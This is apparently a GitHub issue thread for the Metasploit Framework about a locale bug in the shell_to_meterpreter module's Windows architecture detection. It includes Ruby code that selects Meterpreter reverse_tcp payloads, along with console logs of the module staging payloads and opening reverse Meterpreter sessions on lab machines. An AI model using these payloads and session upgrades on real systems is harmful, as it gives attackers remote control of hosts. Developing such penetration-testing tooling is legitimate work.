### ISSUE TITLE
shell_to_meterpreter: OS architecture detection fails on non-English locales

### ISSUE THREAD

**Issue by bcoles** [rapid7/metasploit-framework#17896]
On Windows systems configured with a non-english locale, the OS detection will fail resulting in an error: "Target is running Windows on an unsupported architecture such as Windows ARM!"

This error is incorrect and rather confusing. In most cases the issue likely has nothing to do with Windows ARM (at least, until Windows on ARM becomes more popular).

In my opinion the best approach is:

```ruby
      arch = cmd_exec('wmic os get osarchitecture').to_s.downcase

      unless arch.include?('osarchitecture')
        print_error('Could not retrieve Windows system architecture!')
        return nil
      end

      if arch =~ /^64/
        payload_name = 'windows/x64/meterpreter/reverse_tcp'
        larch = [ARCH_X64]
        psh_arch = 'x64'
      if arch =~ /^32/
        payload_name = 'windows/meterpreter/reverse_tcp'
        larch = [ARCH_X86]
        psh_arch = 'x86'
      else
        print_error("wmic returned unsupported architecture: #{arch}")
        return nil
      end
```

This approach is a quick, cheap and easy solution building on the existing OS detection. Although this approach isn't perfect, it is a significant improvement over the existing OS detection.

I haven't submitted the above as a PR as I don't have access to a Windows ARM host to verify whether this would result in false positive matches for "32" or "64".

There was a previous (abandoned) attempt to fix this. There is additional history and discussion in that PR. The solution in the PR was not as robust as the above solution and was eventually abandoned.

* https://github.com/rapid7/metasploit-framework/pull/16965

---

Note that `wmic os get osarchitecture` will fail on Windows XP SP3 (but this is a different issue):

* #16785

**Comment by Young-Lord** [comment]
it works well with a bugfix: change `elsif arch =~ /^32/` to `if arch =~ /^32/`
```
      arch = cmd_exec('wmic os get osarchitecture').to_s.downcase

      unless arch.include?('osarchitecture')
        print_error('Could not retrieve Windows system architecture!')
        return nil
      end

      if arch =~ /^64/
        payload_name = 'windows/x64/meterpreter/reverse_tcp'
        larch = [ARCH_X64]
        psh_arch = 'x64'
      elsif arch =~ /^32/
        payload_name = 'windows/meterpreter/reverse_tcp'
        larch = [ARCH_X86]
        psh_arch = 'x86'
      else
        print_error("wmic returned unsupported architecture: #{arch}")
        return nil
      end
```

**Comment by bwatters-r7** [comment]
FWIW, if we wanted to make the arch a bit more correct:
```
msf6 payload(cmd/windows/powershell_reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

PS C:\Users\msfuser> systeminfo

Host Name:                 ARM-PC
OS Name:                   Microsoft Windows 11 Pro
OS Version:                10.0.22621 N/A Build 22621
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          msfuser01
Registered Organization:   N/A
Product ID:                00330-66899-15618-AAOEM
Original Install Date:     9/5/2022, 9:52:02 PM
System Boot Time:          7/21/2023, 1:26:18 PM
System Manufacturer:       Microsoft Corporation
System Model:              Windows Dev Kit 2023
System Type:               ARM64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: ARMv8 (64-bit) Family 8 Model D4B Revision   0 Qualcomm Technologies Inc ~2995 Mhz
BIOS Version:              Microsoft Corporation 6.5.139, 1/1/1601
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     32,165 MB
Available Physical Memory: 24,472 MB
Virtual Memory: Max Size:  37,285 MB
Virtual Memory: Available: 29,656 MB
Virtual Memory: In Use:    7,629 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\ARM-PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB5026039
                           [02]: KB5014958
                           [03]: KB5015713
Network Card(s):           2 NIC(s) Installed.
                           [01]: Surface Ethernet Adapter
                                 Connection Name: Ethernet
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.5.135.1
                                 IP address(es)
                                 [01]: 10.5.135.105
                                 [02]: fe80::c15e:8c28:ee76:2f0f
                           [02]: Bluetooth Device (Personal Area Network)
                                 Connection Name: Bluetooth Network Connection
                                 Status:          Media disconnected
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.
PS C:\Users\msfuser> wmic os get osarchitecture
OSArchitecture        

ARM 64-bit Processor  



PS C:\Users\msfuser> 
```

**Comment by bcoles** [comment]
> FWIW, if we wanted to make the arch a bit more correct:

Can you show the output of `wmic os get osarchitecture` on that system?

See also: https://github.com/rapid7/metasploit-framework/pull/16965#issuecomment-1243156240

**Comment by bwatters-r7** [comment]
> Can you show the output of wmic os get osarchitecture on that system?

Sorry; I probably should have separated the commands above, but I ran `systeminfo` followed by `wmic os get osarchitecture` to show the hardware and the command output.
They're in the same block, so they did run together a bit.  If that was not what you were looking for, let me know!

**Comment by bcoles** [comment]
> @bcoles I think this is fixed now based on testing [#16785 (comment)](https://github.com/rapid7/metasploit-framework/issues/16785#issuecomment-1775510088) - the new implementation uses ENV vars to detect the architecture now, so there shouldn't be any issues with locale now 🤞
> 
> Do you have a test VM set up still? I had no luck finding a non-english XP3 to test this issue out with unfortunately

The only XP machine I have is English, but I'd be more concerned about breaking support for everything else than breaking support for Windows XP.

Presuming no bugs in `get_env`, the environment variable and regex approach should work.

For x86, I took a look through the output of `set` on a bunch of different Windows 2000, Windows 2003, and Windows 2008 machines with various non-English locales. Expected output, but untested.

Likewise, for x86_64 / amd64, I checked `set` on a few locales. Expected output. I tested on Windows 2008 with Chinese and French locales.

# Windows Server 2008 (x64) French

```
msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...


Shell Banner:
Microsoft Windows [version 6.0.6002]
Copyright (c) 2006 Microsoft Corporation. Tous droits r_serv_s.

C:\Users\user\Downloads>
-----
          

C:\Users\user\Downloads>ver
ver

Microsoft Windows [version 6.0.6002]

C:\Users\user\Downloads>^Z
Background session 1? [y/N]  y
msf6 exploit(multi/handler) > 
msf6 exploit(multi/handler) > use post/multi/manage/shell_to_meterpreter 
msf6 post(multi/manage/shell_to_meterpreter) > set verbose true
verbose => true
msf6 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1
msf6 post(multi/manage/shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[*] Platform: Windows
[*] Upgrade payload: windows/x64/meterpreter/reverse_tcp
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.200.130:4433 
[-] Powershell is not installed on the target.
[*] Transfer method: VBS [fallback]
[*] Starting transfer...
[*] Command stager progress: 14.11% (1699/12045 bytes)
[*] Command stager progress: 28.21% (3398/12045 bytes)
[*] Command stager progress: 42.32% (5097/12045 bytes)
[*] Command stager progress: 56.42% (6796/12045 bytes)
[*] Command stager progress: 70.53% (8495/12045 bytes)
[*] Command stager progress: 84.29% (10153/12045 bytes)
[*] Command stager progress: 98.17% (11825/12045 bytes)
[*] Command stager progress: 100.00% (12045/12045 bytes)
[*] Cleaning up handler
[*] Post module execution completed
[*] Waiting up to 30 seconds for the session to come back

[*] Sending stage (200774 bytes) to 192.168.200.136
msf6 post(multi/manage/shell_to_meterpreter) > [*] Meterpreter session 2 opened (192.168.200.130:4433 -> 192.168.200.136:49164) at 2023-10-23 23:09:07 -0400
[*] Stopping exploit/multi/handler

msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: WIN-ABDSZZCODW7\user
meterpreter > sysinfo 
Computer        : WIN-ABDSZZCODW7
OS              : Windows 2008 (6.0 Build 6002, Service Pack 2).
Architecture    : x64
System Language : fr_FR
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
```

# Windows Server 2008 R2 (x64) Chinese

Fails, and powershell process crashes.

```
msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...


Shell Banner:
Microsoft Windows [_ 6.1.7601]
_ (c) 2009 Microsoft Corporation_

C:\Users\user\Downloads>
-----
          

C:\Users\user\Downloads>ver
ver

Microsoft Windows [�汾 6.1.7601]

C:\Users\user\Downloads>^Z
Background session 1? [y/N]  y
msf6 exploit(multi/handler) > use post/multi/manage/shell_to_meterpreter 
msf6 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1
msf6 post(multi/manage/shell_to_meterpreter) > set verbose true
verbose => true
msf6 post(multi/manage/shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[*] Platform: Windows
[*] Upgrade payload: windows/x64/meterpreter/reverse_tcp
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.200.130:4433 
[*] Transfer method: Powershell
[*] Powershell command length: 4441
[*] Cleaning up handler
[*] Post module execution completed
[*] Waiting up to 30 seconds for the session to come back
msf6 post(multi/manage/shell_to_meterpreter) > 
```

Patching `lib/msf/core/post/architecture.rb` shows the architecture was detected correctly.

```
msf6 post(multi/manage/shell_to_meterpreter) > edit lib/msf/core/post/architecture.rb
[*] Reloading /root/Desktop/metasploit-framework/lib/msf/core/post/architecture.rb
msf6 post(multi/manage/shell_to_meterpreter) > rexploit 
[*] Reloading module...

[*] Upgrading session ID: 1
"AMD64"
[*] Platform: Windows
[*] Upgrade payload: windows/x64/meterpreter/reverse_tcp
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.200.130:4433 
[*] Transfer method: Powershell
[*] Powershell command length: 4446
[*] Cleaning up handler
[*] Post module execution completed
[*] Waiting up to 30 seconds for the session to come back
msf6 post(multi/manage/shell_to_meterpreter) >
```

Forcing VBS causes wscript to crash with an error message I can't read but suspiciously mentions `64`.

![image](https://github.com/rapid7/metasploit-framework/assets/434827/0b8c81e8-6f96-4201-b083-3c96e29e4c8d)


```
msf6 post(multi/manage/shell_to_meterpreter) > set WIN_TRANSFER VBS
WIN_TRANSFER => VBS
msf6 post(multi/manage/shell_to_meterpreter) > run

[*] Upgrading session ID: 1
"AMD64"
[*] Platform: Windows
[*] Upgrade payload: windows/x64/meterpreter/reverse_tcp
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.200.130:4433 
[*] Transfer method: VBS [fallback]
[*] Starting transfer...
[*] Command stager progress: 14.11% (1699/12045 bytes)
[*] Command stager progress: 28.21% (3398/12045 bytes)
[*] Command stager progress: 42.32% (5097/12045 bytes)
[*] Command stager progress: 56.42% (6796/12045 bytes)
[*] Command stager progress: 70.53% (8495/12045 bytes)
[*] Command stager progress: 84.29% (10153/12045 bytes)
[*] Command stager progress: 98.17% (11825/12045 bytes)
[*] Command stager progress: 100.00% (12045/12045 bytes)
[*] Cleaning up handler
[*] Post module execution completed
[*] Waiting up to 30 seconds for the session to come back
msf6 post(multi/manage/shell_to_meterpreter) > 
```

**Comment by bcoles** [comment]
Closing this issue. Fixed in #18062.

Above comment https://github.com/rapid7/metasploit-framework/issues/17896#issuecomment-1776600790 is likely unrelated to the patch for this issue.
